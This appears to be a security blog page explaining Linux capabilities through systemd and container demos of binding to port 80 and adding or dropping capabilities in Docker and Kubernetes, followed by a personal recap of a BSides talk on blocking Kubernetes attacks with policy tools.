Fast forward to 2.2.24 and it is still simple, but just drops super user for capabilities:
asmlinkage int sys_setgid(gid_t gid)
{
    int old_egid = current->egid;

    if (capable(CAP_SETGID))
        current->gid = current->egid = current->sgid = current->fsgid = gid;
    else if ((gid == current->gid) || (gid == current->sgid))
        current->egid = current->fsgid = gid;
    else
        return -EPERM;

    if (current->egid != old_egid)
        current->dumpable = 0;
    return 0;
}

Fast forward to the newest version and it gets more complicated, so we'll avoid that.
The Root Problem
The old model had no concept of “just enough privilege.” If you wanted to let a program:

Bind to a port below 1024 (bind())
Run ping (requires raw socket access)
Trace another process (ptrace())

You had to give it full root, which meant total control over the system. Not ideal.
Available Capabilities
There are currently 41 capabilities in Linux defined in two sources:

man 7 capabilities - human-readable descriptions
include/uapi/linux/capability.h - actual definitions in the kernel

Example from the header file:
/* Allow ioperm/iopl access */
/* Allow sending USB messages to any device via /dev/bus/usb */

#define CAP_SYS_RAWIO        17

/* Allow use of chroot() */

#define CAP_SYS_CHROOT       18

/* Allow ptrace() of any process */

#define CAP_SYS_PTRACE       19

These header definitions are used throughout the kernel wherever permission checks are needed. You’ll see them pop up in everything from mount() to chroot(). 
More Than Just On or Off
Capabilities aren’t just a binary “has it / doesn’t have it.”  When a process runs, the kernel keeps several capability sets that define not only what’s possible, but what’s actually in effect. This is a high level overview of what these are. 




Set What It Controls                                               



Permitted The menu of capabilities the process may make effective or inheritable.

Effective The subset currently in use, what the process is actively wielding right now.

Inheritable Capabilities the process can pass along to child processes during execve().

Bounding The hard ceiling, if it’s not here, it can never be granted later, even to root.

Ambient Lets certain capabilities stick around across execve() for non-root processes.


You can check a running process’s capabilities with:
grep Cap /proc/$$/status

For a friendlier view (with names instead of hex):
capsh --print


Practical Example with CAP_NET_BIND_SERVICE
Let's walk through our capabilities with low port bindings. We'll try to set a service to bind to a port below 1024. Let's start with a simple C app that we'll call bind_low_port. This app will simply try to bind, not run anything persistent. Here is the app:
// bind_low_port.c
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int main() {
    int sockfd;
    struct sockaddr_in addr;

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == -1) {
        perror("socket");
        return 1;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(80); // Privileged port (<1024)

    if (bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind");
        return 1;
    }

    printf("Successfully bound to port 80\n");
    close(sockfd);
    return 0;
}

Go ahead and compile that and drop it into /usr/local/bin:
sudo gcc -o /usr/local/bin/bind_low_port bind_low_port.c
sudo chmod +x /usr/local/bin/bind_low_port bind_low_port.c

Now the app is ready to go!
Run as Root
Now let's rewind to the pre-capabilities days. We need to make sure we are root to get this to work so let's create a service to run as root! Save the following as bind-root.service.
[Unit]
Description=Bind to port 80 as root

[Service]
ExecStart=/usr/local/bin/bind_low_port
User=root

[Install]
WantedBy=multi-user.target

Copy it into our systemd directory, enable it, start it, and check status:
sudo cp bind-root.service /etc/systemd/system/
sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl start bind-root.service
sudo systemctl status bind-root

And you should see:
○ bind-root.service - Bind to port 80 as root
     Loaded: loaded (/etc/systemd/system/bind-root.service; disabled; preset: enabled)
     Active: inactive (dead)

Aug 08 20:32:52 controlplane systemd[1]: Started bind-root.service - Bind to port 80 as root.
Aug 08 20:32:52 controlplane bind_low_port[2400223]: Successfully bound to port 80
Aug 08 20:32:52 controlplane systemd[1]: bind-root.service: Deactivated successfully.

Worked as expected, but not a desirable permission level.
Run with Net Bind Capability
Now let's get to the capabilities world. We no longer need root! Save the following as a bind-captest.service.
[Unit]
Description=Bind to port 80 with CAP_NET_BIND_SERVICE

[Service]
ExecStart=/usr/local/bin/bind_low_port
User=captest
Group=captest
AmbientCapabilities=CAP_NET_BIND_SERVICE
CapabilityBoundingSet=CAP_NET_BIND_SERVICE
NoNewPrivileges=true

[Install]
WantedBy=multi-user.target

We'll need to create this non-privileged user and group. 
sudo groupadd --system captest
sudo useradd --system --no-create-home --gid captest captest

Copy it into your systemd directory, enable it, start it, and check status:
sudo cp bind-captest.service /etc/systemd/system/
sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl start bind-captest.service
sudo systemctl status bind-captest

And you should see:
○ bind-captest.service - Bind to port 80 with CAP_NET_BIND_SERVICE
     Loaded: loaded (/etc/systemd/system/bind-captest.service; disabled; preset: enabled)
     Active: inactive (dead)

Aug 08 20:21:13 controlplane systemd[1]: bind-captest.service: Failed with result 'exit-code'.
Aug 08 20:22:13 controlplane systemd[1]: Started bind-captest.service - Bind to port 80 with CAP_NET_BIND_SERVICE.
Aug 08 20:22:13 controlplane bind_low_port[2392163]: Successfully bound to port 80
Aug 08 20:22:13 controlplane systemd[1]: bind-captest.service: Deactivated successfully

Worked as expected and with least privilege. Not too bad.
Run with No Root and No Capability
Again we'll create a service. Save the following as bind-nonroot.service.
[Unit]
Description=Bind to port 80 with no capabilities

[Service]
ExecStart=/usr/local/bin/bind_low_port
User=captest
Group=captest
NoNewPrivileges=true

[Install]
WantedBy=multi-user.target

No need to create the user and group as we did that in the previous step. Copy it into our systemd directory, enable it, start it, and check status:
sudo cp bind-nonroot.service /etc/systemd/system/
sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl start bind-nonroot.service
sudo systemctl status bind-nonroot

And you should see:
× bind-nonroot.service - Bind to port 80 with no capabilities
     Loaded: loaded (/etc/systemd/system/bind-nonroot.service; disabled; preset: enabled)
     Active: failed (Result: exit-code) since Fri 2025-08-08 20:28:15 UTC; 11min ago
   Duration: 4ms
   Main PID: 2396701 (code=exited, status=1/FAILURE)
        CPU: 1ms

Aug 08 20:28:15 controlplane systemd[1]: Started bind-nonroot.service - Bind to port 80 with no capabilities.
Aug 08 20:28:15 controlplane bind_low_port[2396701]: bind: Permission denied
Aug 08 20:28:15 controlplane systemd[1]: bind-nonroot.service: Main process exited, code=exited, status=1/FAILURE
Aug 08 20:28:15 controlplane systemd[1]: bind-nonroot.service: Failed with result 'exit-code'.

Failed just as expected. 
So we hit the trifecta. No bonus payout, sadly. Here is a quick recap:




Service Type Can Bind Port 80? Privilege Level Notes



Root Yes Full root Risky: has all powers

Non-root + Capability Yes Scoped via CAP_NET_BIND_SERVICE Just enough privilege

Non-root, No Capability No No elevated privileges Expected failure (Permission denied)


Now that we've laid the groundwork, let's dive into something near and dear.

Capabilities in Container Land
Docker Containers
By default, Docker containers run with a reduced set of capabilities, but not empty. Let's create a simple Dockerfile that gives us some tools.
FROM ubuntu:22.04
RUN apt update && apt install -y \
    libcap2-bin \
    strace \
    util-linux \
    iproute2 \
    procps \
    net-tools \
    python3 \
    curl \
    && apt clean

Then create and run in interactive mode:
docker build -t captest .
docker run --rm -it captest

Now let's check our capabilities.
root@12801a8bb3a8:/# capsh --print
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: UNCERTAIN (0)

You’ll see things like CAP_NET_BIND_SERVICE, CAP_CHOWN, and CAP_DAC_OVERRIDE still available.
Test something allowed such as CAP_CHOWN:
root@12801a8bb3a8:/# touch testfile && chown nobody:nogroup testfile && ls
bin  boot  dev  etc  home  lib  media  mnt  opt  proc  root  run  sbin  secret  srv  sys  testfile  tmp  usr  var

Test something not allowed such as CAP_NET_ADMIN:
root@12801a8bb3a8:/# ip link add dummy0 type dummy
RTNETLINK answers: Operation not permitted

Exit the container and we can try to drop and add a capability.
docker run --rm -it --cap-drop=CHOWN --cap-add=CAP_NET_ADMIN captest

And now the capabilities have switched:
root@2d6de2b45347:/# touch file
root@2d6de2b45347:/# chown nobody file
chown: changing ownership of 'file': Operation not permitted
root@54e336fcd322:/# ip link add dummy0 type dummy
root@54e336fcd322:/#

That all worked as expected. We've seen the defaults and shown how to add and drop capabilities. 
Kubernetes Pods
Let's try the same thing in Kubernetes. Create the following pod definition:
apiVersion: v1
kind: Pod
metadata:
  name: cap-default
spec:
  containers:
  - name: cap-default
    image: ubuntu
    command: ["sleep", "infinity"]

Deploy the pod and exec in:
kubectl apply -f captest-pod.yaml
kubectl exec -it cap-default -- /bin/bash

Install the relevant tools and check the capabilities. They will be as expected from our Docker experiment:
root@cap-default:/# apt update && apt install -y \
    libcap2-bin \
    strace \
    util-linux \
    iproute2 \
    procps \
    net-tools \
    python3 \
    curl \
    && apt clean
root@cap-default:/# capsh --print
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1'b0 (no-new-privs=0)
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: HYBRID (4)

Now let's change the pod definition to add and drop capabilities. Here is our new definition:
apiVersion: v1
kind: Pod
metadata:
  name: cap-custom
spec:
  containers:
  - name: cap-custom
    image: ubuntu:22.04
    command: ["sleep", "infinity"]
    securityContext:
      capabilities:
        drop:
        - CHOWN
        add:
        - NET_ADMIN

Deploy the pod and exec in:
kubectl apply -f cap-custom.yaml
kubectl exec -it cap-custom -- /bin/bash

Install the relevant tools and check the capabilities. They will be as expected from our Docker experiment (you might see a lot of errors due to dropping CAP_CHOWN:
root@cap-custom:/# apt update && apt install -y \
    libcap2-bin \
    strace \
    util-linux \
    iproute2 \
    procps \
    net-tools \
    python3 \
    curl \
    && apt clean
root@cap-custom:/# capsh --print
Current: cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_admin,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding set =cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_admin,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: !cap_chown,!cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: UNCERTAIN (0)

Our quick tests showed the same rule applies whether you’re running a straight Docker container or running in Kubernetes:  

In Docker, a container running as root starts with a limited set of default capabilities. We proved that if a capability like CAP_NET_ADMIN isn’t present, privileged operations (e.g., ip link add) fail with Operation not permitted.  
In Kubernetes, the securityContext gives you fine-grained control. You can:
Drop capabilities you don’t want (e.g., CAP_CHOWN) to shrink the attack surface, even for root.
Add specific capabilities (e.g., CAP_NET_ADMIN) to grant only what’s needed without giving the Pod full root privileges.



Capabilities are your surgical tool for granting just enough privilege, whether that’s binding to a low port, tweaking networking, or blocking risky syscalls. 

Final Thoughts: Why Capabilities Matter
From the early days of Linux, privilege was an all-or-nothing deal, UID 0 could do everything, everyone else got EPERM.  That simplicity came at a cost: giving a process one privileged action meant giving it all of them.
Linux 2.2’s introduction of capabilities changed that. Privilege could now be split into fine-grained units like CAP_NET_BIND_SERVICE or CAP_SYS_PTRACE, tied directly to specific syscalls. Our NET_BIND example showed how this plays out in practice:

Root-only service: Works, but comes with every privilege.
Capability-only service: Works for the intended action (binding port 80) without extra power.
No capability: Fails as expected.

When we moved into containers, the same principle held:
Docker and Kubernetes both start with a reduced set of capabilities for root, and both let you add or drop individual privileges. Our tests showed:

Dropping CAP_CHOWN removes the ability to change file ownership, even for root.
Without CAP_NET_ADMIN, network device management fails with Operation not permitted.
Adding just the required capability restores the intended function without re-granting full root.

The takeaway: capabilities are one of the cleanest ways to shrink your attack surface without breaking legit workloads. I think of them as a firewall for syscalls. You can allow only what you need, block everything else, and never give away more than necessary.



When YAML Fights Back: My Runtime Security Talk at BSides
Matt Brown — Wed, 06 Aug 2025 05:53:59 GMT
I gave a talk at BSides Las Vegas where we blocked a live threat right in the middle of a reverse shell attempt. With defense in depth of all things. Well, not live, but there were screencaps!
The talk focused on preventing attacks in Kubernetes using policy-as-code tools like Kyverno and KubeArmor. No “AI for runtime.” Just a vulnerable Flask app, an RCE payload, and enforcement policies that shut it down cold. 
Here’s a quick look back at the process and experience of the talk. This is less about the content that you can grab here. Ignore the excess commits to fix Markdown and other issues in the README.

btw you can see it right at the beginning here


What the talk covered
The core idea was simple: show how sad Kubernetes workloads can be blocked and then have the capability to squash the leftover bad behavior. All of this was done with open source tools anyone can try.
The scenario started with a deliberately vulnerable Flask app (very contrived, but I think interesting nonetheless), running in a misconfigured pod with:

The root user inside the container
A NodePort service exposed
And a neat little OS command injection bug

From there, I walked through a simulated attack chain:
Attacker hits the exposed app ➝ gains shell access ➝ attempts the usual container hackery.
But then we stopped it at two key stages:

At admission: Kyverno blocked the insecure pod from even deploying if it ran as root. No, you don't...
At runtime: KubeArmor enforced syscall-level restrictions via LSMs.

This wasn’t abstract. The talk was built around a live lab, with policies, manifests, and attack steps running in a real cluster. Don't judge the actual apps and manifests too harshly.

The Prep
The prep took a hella long time, probably because I completely overthought it. Going through the CFP was actually lightning quick, I had it done in a few days. I submitted it with little expectation of being selected. But on a Friday I found out I was selected. Felt good for a bit until I realized I actually had to flesh out a talk and slides. 
It was through BSides Proving Grounds, which provided me an opportunity to have a mentor. Jimmy Shah was totally awesome and encouraging. He never told me what to do, but rather helped me when I was a bit off. 
Sequence of Events:

Developed and submitted CFP in May
Finished slides (mostly) in June
Spent ages rehearsing and revising
Day before BSides did a dry run with a few folks and got great feedback on the last day (literally) 

No gambling the night before, just beer, of course.

The Live Experience
This was the first time I delivered a self-crafted talk in a room of at least 30. I had spent days circulating the talk in my head. Trust me, I could hardly keep it from entering my dreams.
I spent quite a bit of time on this and went back and forth on a lot of things. But I think I came to something that worked at the end.
A few things stood out:

You lose the nerves once you start talking. For the entire 25+ minutes (yes I was probably long) I felt fine, despite the occasional stumble and repetition.

I felt good because I believe the content is good and I did something right in my wheelhouse.

It wasn't the crowd that knew Kubernetes like the folks at KubeCon, but I think with my proper anchors it made sense (got this feedback from a few K8s amateurs).

It wasn't a cool talk, like those with awesome ways to make iPhones cool again, but I think it was just enough.



The End
Once it was done, like the second after, I felt a huge relief. I won't watch it for a little while just to make sure I don't judge my cringy talk too harshly. Later I got to meet some really cool people and became known as the Kubemaster (definitely need a less praiseworthy handle). It was a great experience and I would encourage anyone who has not done something like this to give it a shot. Anyone reading this probably has better ideas. If anyone has made it this far, I hope to have the chance to do it again, but that will require some original thoughts. Back at you Red Bull Racing.

Set	What It Controls
Permitted	The menu of capabilities the process may make effective or inheritable.
Effective	The subset currently in use, what the process is actively wielding right now.
Inheritable	Capabilities the process can pass along to child processes during `execve()`.
Bounding	The hard ceiling, if it’s not here, it can never be granted later, even to root.
Ambient	Lets certain capabilities stick around across `execve()` for non-root processes.

Field	What it does	Notes
`kinds`	Resource kind (`Pod`, `Deployment`, etc.)	Case-sensitive.
`names`	Specific object names	Exact match only.
`namespaces`	Namespace name(s)	Ignored for cluster-scoped kinds.
`selector`	Labels on the resource	Standard `matchLabels`/`matchExpressions`.
`annotations`	Match by annotations	Same syntax as labels.
`operations`	Admission verbs	`CREATE`, `UPDATE`, `DELETE`, `CONNECT`.
`userInfo`	Who made the request	Roles, clusterRoles, users, service accounts.

Service Type	Can Bind Port 80?	Privilege Level	Notes
Root	Yes	Full root	Risky: has all powers
Non-root + Capability	Yes	Scoped via `CAP_NET_BIND_SERVICE`	Just enough privilege
Non-root, No Capability	No	No elevated privileges	Expected failure (Permission denied)

CloudSecBurrito

Runtime Security in Kata: Less Visibility, Better Signal

Diagrams

What you would need if you insisted on the old model

The model we actually care about

Quick reset: what actually changed

Lightning baseline: Falco on a normal container

Fast deploy

Test workload

A singular attack worth testing

What you expect to see

Run the same thing in Kata

Why I am not going to put Falco inside Kata

The micro-agent: less visibility, actual signal

What it looks for

Approximating “drop and execute”

Running the same attack chain

Perfect is the enemy of the good

Wrapup

Kata Containers: When "Container Escape" Stops Working

Diagram

Kata Containers Local Lab Failure

Failure 1: kata-deploy installer issues

Failure 2: RuntimeClass exists, but runtime does not

GCP Fix

Reproducing the Lab on GCP

Set up kubectl

Validate the node

Install Kata

Test Isolation

Let's Escape

Wrap Up

Kafka on Kubernetes

Orientation Diagram

The Architecture We Think We Built

Baseline Deployment

Create Namespaces

Install the Strimzi Operator

Deploy Kafka

Create Kafka Topics

Deploy the Example Workloads

payments-api

payments-worker

Testing Kafka Access

Generate Payment Events

Intended Read

Unintended Read

Cross Namespace Access

Restricting Kafka Access with Strimzi Network Peers

Bring Your Own NetworkPolicy

Wrap Up

Seccomp in Kubernetes

Orientation Diagram

The Most Common Case: Nothing Configured

A Simple Way to See Seccomp in Action

RuntimeDefault: Making the Baseline Explicit

The Actual RuntimeDefault Profile

Unconfined and Privileged

Making Seccomp the Default (kubeadm)

Wrap Up

Seccomp: The Syscall Firewall

Introduction

Orientation Diagram: Where Seccomp Intercepts Syscalls

Where Seccomp Runs in the Kernel

Why Seccomp Is a Different Control Layer

The One-Way Property

How Seccomp Gets Enabled

Seccomp Is Enabled Per Process

What prctl() Is

Who Enables Seccomp in Practice

Where We Are So Far

What a Seccomp “Profile” Actually Is

Profiles Are Filters, Not Rules

Default-Deny Is the Point

Tooling Is Just a Compiler

A Concrete Example: What Seccomp Actually Does

What We’re Trying to Show

The Demo Program

Prereqs

Compile and Run

What `prctl()` Is

Orientation Diagram: The `securityContext` Contract

What `securityContext` Is (and Is Not)

Pod-Level vs Container-Level `securityContext`

Pod-Level `securityContext`

Container-Level `securityContext`

Mapping `securityContext` to Kernel Enforcement (What Actually Happens)

`securityContext` Fields and Kernel Mapping

Privilege Escalation (`no_new_privs`)

Example `config.yaml`